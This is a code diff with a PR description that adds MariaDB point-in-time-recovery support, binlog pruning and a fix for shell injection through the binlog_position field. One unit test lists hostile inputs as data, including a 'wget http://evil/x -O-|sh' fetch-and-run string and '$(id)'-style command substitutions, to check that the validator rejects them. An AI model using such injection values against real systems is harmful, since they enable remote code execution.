@@ -4249,6 +4582,48 @@ mod tests {
             MariaDbService::shell_single_quote("2026-06-23 14:30:15"),
             "'2026-06-23 14:30:15'"
         );
+    }
+
+    #[test]
+    fn validate_binlog_position_accepts_decimal_offsets() {
+        assert_eq!(
+            MariaDbService::validate_binlog_position("4").expect("plain offset"),
+            "4"
+        );
+        assert_eq!(
+            MariaDbService::validate_binlog_position("18446744073709551615").expect("u64::MAX"),
+            "18446744073709551615"
+        );
+    }
+
+    #[test]
+    fn validate_binlog_position_rejects_shell_metacharacters() {
+        // The exact injection shape a tampered S3 `metadata.json` would use:
+        // without validation this reaches `sh -c` inside the DB container.
+        for hostile in [
+            "4; wget http://evil/x -O-|sh; echo ",
+            "4 && touch /tmp/pwned",
+            "$(id)",
+            "`id`",
+            "4|id",
+            "4\nid",
+            "4'",
+            "",
+            " 4",
+            "4 ",
+            "0x10",
+            "-1",
+            "999999999999999999999", // 21 digits, over the cap
+        ] {
+            let err = MariaDbService::validate_binlog_position(hostile)
+                .expect_err("hostile binlog_position must be rejected");
+            assert!(
+                err.to_string().contains("Invalid binlog_position"),
+                "unexpected error for {:?}: {}",
+                hostile,
+                err
+            );
+        }
     }
 
     #[test]

--- a/crates/temps-providers/src/health_monitor.rs
+++ b/crates/temps-providers/src/health_monitor.rs
@@ -28,8 +28,8 @@ use std::sync::Arc;
 use std::time::{Duration, Instant};
 use temps_core::EncryptionService;
 use temps_entities::{
-    backup_schedule_services, backup_schedules, external_service_health_checks, external_services,
-    project_services, s3_sources,
+    backup_schedule_services, backup_schedules, external_service_backups,
+    external_service_health_checks, external_services, project_services, s3_sources,
 };
 use temps_metrics::{MetricKind, MetricPoint, MetricsStore, SourceKind};
 use temps_monitoring::alarm_service::{AlarmService, AlarmSeverity, AlarmType, FireAlarmRequest};
@@ -74,6 +74,19 @@ pub enum HealthMonitorError {
 
     #[error("External service {id} not found")]
     ServiceNotFound { id: i32 },
+
+    /// The MariaDB binlog-retention anchor could not be established, so no
+    /// archived segment may be deleted this run. Carries the service and the
+    /// concrete reason because the only signal an operator gets is the log
+    /// line — an unexplained "not pruning" is indistinguishable from a bug.
+    #[error(
+        "MariaDB binlog retention anchor for service {service_id} ('{service_name}') is undetermined: {reason}"
+    )]
+    BinlogRetentionAnchor {
+        service_id: i32,
+        service_name: String,
+        reason: String,
+    },
 }
 
 /// Background loop that keeps `external_services.health_status` in sync with
@@ -519,6 +532,11 @@ impl ExternalServiceHealthMonitor {
                         shipped,
                         "Archived MariaDB binlog segment(s) to S3"
                     );
+                    // Retention counterpart to the ship. Only after something
+                    // new landed — a no-op tick cannot have made an older
+                    // segment newly unreachable, so there is nothing to prune.
+                    self.prune_mariadb_binlogs(service, &mariadb, &s3_client, &s3_source)
+                        .await;
                 }
             }
             Err(e) => {
@@ -529,6 +547,148 @@ impl ExternalServiceHealthMonitor {
                 );
             }
         }
+    }
+
+    /// Delete archived binlog segments that no retained base backup can reach.
+    ///
+    /// `archive_binlogs` only ever uploads, so without this the `binlog/`
+    /// prefix grows for the life of the service. The anchor is the recorded
+    /// `binlog_file` of the OLDEST retained physical base backup: PITR replay
+    /// always starts at its base's own coordinate, so nothing older than the
+    /// oldest base is reachable from any retained backup.
+    ///
+    /// Failures are logged and swallowed, like the archive itself — losing a
+    /// prune run costs storage, never data.
+    async fn prune_mariadb_binlogs(
+        &self,
+        service: &external_services::Model,
+        mariadb: &MariaDbService,
+        s3_client: &aws_sdk_s3::Client,
+        s3_source: &s3_sources::Model,
+    ) {
+        let anchor = match self
+            .oldest_retained_mariadb_base_anchor(service, mariadb, s3_client, s3_source)
+            .await
+        {
+            Ok(Some(anchor)) => anchor,
+            Ok(None) => {
+                debug!(
+                    service_id = service.id,
+                    service = %service.name,
+                    "No retained MariaDB physical base with a binlog anchor; keeping all archived \
+                     binlog segments"
+                );
+                return;
+            }
+            Err(e) => {
+                warn!(
+                    service_id = service.id,
+                    service = %service.name,
+                    "Could not determine MariaDB binlog retention anchor; keeping all archived \
+                     segments: {}", e
+                );
+                return;
+            }
+        };
+
+        match mariadb
+            .prune_stale_binlogs(s3_client, s3_source, &anchor)
+            .await
+        {
+            Ok(0) => {}
+            Ok(pruned) => {
+                info!(
+                    service_id = service.id,
+                    service = %service.name,
+                    pruned,
+                    anchor = %anchor,
+                    "Pruned stale MariaDB binlog segments from S3"
+                );
+            }
+            Err(e) => {
+                warn!(
+                    service_id = service.id,
+                    service = %service.name,
+                    anchor = %anchor,
+                    "MariaDB binlog prune run failed: {}", e
+                );
+            }
+        }
+    }
+
+    /// Resolve the retention anchor: the `binlog_file` recorded by the OLDEST
+    /// still-retained physical base backup of this service.
+    ///
+    /// Backups are hard-deleted (`delete_backup_model` removes the rows), so
+    /// "retained" is simply "the row still exists in a completed state".
+    ///
+    /// Every ambiguous case returns `Ok(None)` / `Err` — i.e. "do not prune":
+    /// - no completed physical base at all (nothing anchors retention yet, and
+    ///   a base backup may be about to run);
+    /// - a completed physical-engine row whose `s3_location` we cannot read as
+    ///   a base object, which would mean the true oldest base is invisible to
+    ///   us and any anchor we picked would be too new;
+    /// - the oldest base has no binlog coordinate (`pitr: false`), so we
+    ///   cannot say which segments it would have needed.
+    async fn oldest_retained_mariadb_base_anchor(
+        &self,
+        service: &external_services::Model,
+        mariadb: &MariaDbService,
+        s3_client: &aws_sdk_s3::Client,
+        s3_source: &s3_sources::Model,
+    ) -> Result<Option<String>, HealthMonitorError> {
+        use sea_orm::QueryOrder;
+
+        let rows = external_service_backups::Entity::find()
+            .filter(external_service_backups::Column::ServiceId.eq(service.id))
+            .filter(external_service_backups::Column::State.eq("completed"))
+            .order_by_asc(external_service_backups::Column::StartedAt)
+            .all(self.db.as_ref())
+            .await?;
+
+        let mut oldest_base: Option<&temps_entities::external_service_backups::Model> = None;
+        for row in &rows {
+            let is_physical_engine = row
+                .metadata
+                .get("engine")
+                .and_then(|v| v.as_str())
+                .is_some_and(|engine| engine == "mariadb_physical");
+            let is_base_object = MariaDbService::is_physical_base_location(&row.s3_location);
+
+            if is_physical_engine && !is_base_object {
+                // A physical backup we can't locate. Its base could be older
+                // than anything else we found, so we have no trustworthy
+                // anchor — decline rather than prune against a newer one.
+                return Err(HealthMonitorError::BinlogRetentionAnchor {
+                    service_id: service.id,
+                    service_name: service.name.clone(),
+                    reason: format!(
+                        "completed mariadb_physical backup row {} has no usable base location ('{}')",
+                        row.id, row.s3_location
+                    ),
+                });
+            }
+            if is_base_object {
+                oldest_base = Some(row);
+                break;
+            }
+        }
+
+        let Some(base) = oldest_base else {
+            return Ok(None);
+        };
+
+        mariadb
+            .base_binlog_anchor(s3_client, &s3_source.bucket_name, &base.s3_location)
+            .await
+            .map_err(|e| HealthMonitorError::BinlogRetentionAnchor {
+                service_id: service.id,
+                service_name: service.name.clone(),
+                reason: format!(
+                    "failed to read binlog anchor from base backup row {}: {}",
+                    base.id, e
+                ),
+            })
     }
 
     /// Check the per-service interval gate and, if elapsed, record `now` as the

--- a/web/src/lib/utils.ts
+++ b/web/src/lib/utils.ts
@@ -9,6 +9,21 @@ export function cn(...inputs: ClassValue[]) {
 }
 
 /**
+ * Backup `format` values that support point-in-time recovery. "walg" is
+ * Postgres's continuous-archive format; "mariadb_physical" is the MariaDB
+ * analog (a mariadb-backup physical base backup with archived binlogs for
+ * replay). Anything else (pg_dump, mariadb_dump, unknown/empty) is a
+ * logical/one-shot backup and cannot be replayed to an arbitrary point in
+ * time. Shared between ServiceRestore.tsx and S3SourceDetail.tsx so both
+ * surfaces recognize new PITR-capable engines the same way.
+ */
+const PITR_CAPABLE_FORMATS = new Set(['walg', 'mariadb_physical'])
+
+export function isPitrCapableFormat(format: string | null | undefined): boolean {
+  return !!format && PITR_CAPABLE_FORMATS.has(format)
+}
+
+/**
  * Runs `action` but doesn't resolve until at least `minMs` has elapsed, even
  * if `action` finishes sooner. Use this to back a spinner (e.g. Tailwind's
  * `animate-spin`, a 1s/rotation animation) so a fast response doesn't cut the

--- a/web/src/pages/S3SourceDetail.tsx
+++ b/web/src/pages/S3SourceDetail.tsx
@@ -51,7 +51,7 @@ import { useBreadcrumbs } from '@/contexts/BreadcrumbContext'
 import { usePageTitle } from '@/hooks/usePageTitle'
 import { listSourceBackupsWithScan, testS3SourceConnection } from '@/lib/s3-sources'
 import { runScheduleNow } from '@/lib/schedule-runs'
-import { cn, formatBytes } from '@/lib/utils'
+import { cn, formatBytes, isPitrCapableFormat } from '@/lib/utils'
 import { iconForServiceType, serviceTypeRouteForEngine } from '@/lib/serviceIcons'
 import { ServiceLogo } from '@/components/ui/service-logo'
 import { Input } from '@/components/ui/input'
@@ -804,7 +804,7 @@ export function S3SourceDetail() {
                                   {backup.engine}
                                 </Badge>
                               ) : null}
-                              {backup.format === 'walg' ? (
+                              {isPitrCapableFormat(backup.format) ? (
                                 <Badge variant="secondary" className="text-xs">
                                   PITR
                                 </Badge>

--- a/web/src/pages/ServiceRestore.tsx
+++ b/web/src/pages/ServiceRestore.tsx
@@ -47,6 +47,7 @@ import {
 } from '@/components/ui/table'
 import { useBreadcrumbs } from '@/contexts/BreadcrumbContext'
 import { usePageTitle } from '@/hooks/usePageTitle'
+import { isPitrCapableFormat } from '@/lib/utils'
 import { useQuery, useMutation } from '@tanstack/react-query'
 import {
   AlertDialog,
@@ -322,7 +323,7 @@ export function ServiceRestore() {
   })
 
   const isOrphan = selectedBackup?.source === 's3_scan'
-  const selectedIsWalG = selectedBackup?.format === 'walg'
+  const selectedSupportsPitr = isPitrCapableFormat(selectedBackup?.format)
   const isCrossService =
     !!selectedBackup?.origin_service_name &&
     !!service?.name &&
@@ -398,7 +399,7 @@ export function ServiceRestore() {
       if (!pitrTargetTime || Number.isNaN(new Date(pitrTargetTime).getTime()))
         return false
       if (pitrToNewService && newServiceName.trim().length === 0) return false
-      if (!selectedIsWalG) return false
+      if (!selectedSupportsPitr) return false
     }
     if (!confirmOk) return false
     // Block on plan errors — user must resolve them (e.g. pick a different
@@ -823,21 +824,24 @@ export function ServiceRestore() {
               htmlFor="mode-pitr"
               className={`flex items-start gap-3 rounded-md border p-3 cursor-pointer ${
                 mode === 'pitr' ? 'border-primary bg-accent/50' : ''
-              } ${capabilities?.pitr === false || !selectedIsWalG ? 'opacity-50 cursor-not-allowed' : ''}`}
+              } ${capabilities?.pitr === false || !selectedSupportsPitr ? 'opacity-50 cursor-not-allowed' : ''}`}
             >
               <RadioGroupItem
                 value="pitr"
                 id="mode-pitr"
-                disabled={capabilities?.pitr === false || !selectedIsWalG}
+                disabled={capabilities?.pitr === false || !selectedSupportsPitr}
                 className="mt-0.5"
               />
               <div className="flex-1">
                 <div className="font-medium">Point-in-time recovery</div>
                 <div className="text-xs text-muted-foreground mt-0.5">
-                  Recover to a specific timestamp via WAL replay. Requires a
-                  WAL-G backup.
-                  {selectedBackup && !selectedIsWalG
-                    ? ' Selected backup is pg_dump; PITR not available.'
+                  {service?.service_type === 'mariadb'
+                    ? 'Recover to a specific timestamp by replaying archived binlogs. Requires a physical (mariadb-backup) base backup.'
+                    : 'Recover to a specific timestamp via WAL replay. Requires a WAL-G backup.'}
+                  {selectedBackup && !selectedSupportsPitr
+                    ? selectedBackup.format === 'mariadb_dump'
+                      ? ' Selected backup is a logical dump; PITR not available.'
+                      : ' Selected backup is pg_dump; PITR not available.'
                     : ''}
                 </div>
               </div>
@@ -873,8 +877,9 @@ export function ServiceRestore() {
                   className="max-w-md"
                 />
                 <p className="text-xs text-muted-foreground">
-                  PostgreSQL will replay archived WAL from the base backup
-                  through this time.
+                  {service?.service_type === 'mariadb'
+                    ? 'MariaDB will replay archived binlogs from the base backup through this time.'
+                    : 'PostgreSQL will replay archived WAL from the base backup through this time.'}
                 </p>
               </div>
               <div className="flex items-center gap-2">
@@ -1122,6 +1127,18 @@ function FormatBadge({ format }: { format?: string | null }) {
     return (
       <Badge className="text-xs bg-emerald-600 hover:bg-emerald-700">
         WAL-G
+      </Badge>
+    )
+  if (format === 'mariadb_physical')
+    return (
+      <Badge className="text-xs bg-emerald-600 hover:bg-emerald-700">
+        mariadb-backup
+      </Badge>
+    )
+  if (format === 'mariadb_dump')
+    return (
+      <Badge variant="secondary" className="text-xs">
+        mysqldump
       </Badge>
     )
   return (


### PR DESCRIPTION
## Summary

MariaDB physical backups (`mariadb-backup`) and binlog-based point-in-time recovery were already implemented at the engine level (`crates/temps-providers/src/externalsvc/mariadb.rs`), but were unreachable in practice: the generic restore orchestrator, backup-format classifier, web console, and CLI only had match arms for postgres/redis/mongodb. This PR closes those integration gaps and fixes several correctness/security issues surfaced by two security-auditor passes along the way.

- **Backend dispatch/classification**: `classify_backup_format`/`list_dump_objects` now recognize MariaDB's `base.mbstream.gz` (physical) and `dump.sql.gz` (logical) shapes; restore-plan strategy classification, PITR gating, the plan-preview step builder, container-name resolution, and the restore **execution** path's PITR-location guard (previously Postgres-shaped, rejecting all MariaDB PITR outright) are now MariaDB-aware.
- **Credential propagation** (pre-restore merge + post-restore password patch) is gated on backup format: a physical restore replaces the `mysql` system schema and propagates the origin's credentials; a logical dump does not.
- **Binlog retention pruning** (previously missing entirely, unlike Postgres's `wal-g delete garbage`): archived binlog segments strictly older than the oldest still-retained physical base's anchor are deleted, guarded by a strict same-basename/same-width filename comparison that fails closed on anything ambiguous.
- **Security fixes** (found + independently re-verified by `security-auditor`):
  - `binlog_position` read from S3-hosted `metadata.json` is now validated as a bounded decimal string and shell-quoted before use (was previously interpolated unquoted into a replay shell script — command injection).
  - The `mariadb-binlog` replay script no longer passes the root password on argv (was reachable via `set -x` tracing into `restore_runs.error_message` and server logs); auth now flows through `MYSQL_PWD`/`MARIADB_PWD` only.
- **Web console** (`ServiceRestore.tsx`, `S3SourceDetail.tsx`): PITR reachability and format badges now driven by the actual backup format instead of a hardcoded `format === 'walg'` check; copy is engine-aware.
- **CLI**: `list-backups` shows the real backup format (colored by PITR capability) instead of an `s3://`-prefix guess that mislabeled every MariaDB backup as "legacy"; `--pitr` help text is engine-neutral.

## Test plan

- [x] `cargo check --lib` / `cargo clippy --all-targets -- -D warnings` / `cargo fmt --check` clean (via resolved `cargo` binary, not through rtk)
- [x] `cargo test -p temps-backup` (175 passed) and `cargo test -p temps-providers --lib` (589 passed), including new unit tests for the format classifier, PITR location guard, `binlog_position` validation (adversarial command-injection cases), and credential-propagation gating
- [x] `cargo test --test mariadb_pitr_e2e -p temps-backup --features docker-tests` passes (base backup → binlog archive → PITR replay → correct row-level result)
- [x] Live end-to-end verification against a local dev instance:
  - Created a MariaDB service, configured a MinIO S3 source, triggered a base backup via the console
  - Wrote real test rows with known binlog timestamps, let the binlog archiver ship real segments
  - `services restore --pitr` via the CLI to a new service: correctly excluded a row landing in the same second as the boundary (matches `mysqlbinlog --stop-datetime` semantics) and correctly included/excluded rows either side of a clean boundary
  - Plain (non-PITR) restore-to-new-service via CLI: correctly restored exactly the base snapshot
  - Web console: confirmed the PITR radio is enabled/reachable with correct MariaDB-specific copy and format badges, backup list renders `mariadb-backup`/format correctly
  - Confirmed no credential leakage into server logs or `restore_runs.error_message` across all runs
- [x] Two `security-auditor` passes: first pass found 1 blocking (PITR execution guard) + 3 high/medium findings (command injection, password-on-argv leak, format-blind credential merge), all fixed; re-verification pass returned PASS with no remaining blocking issues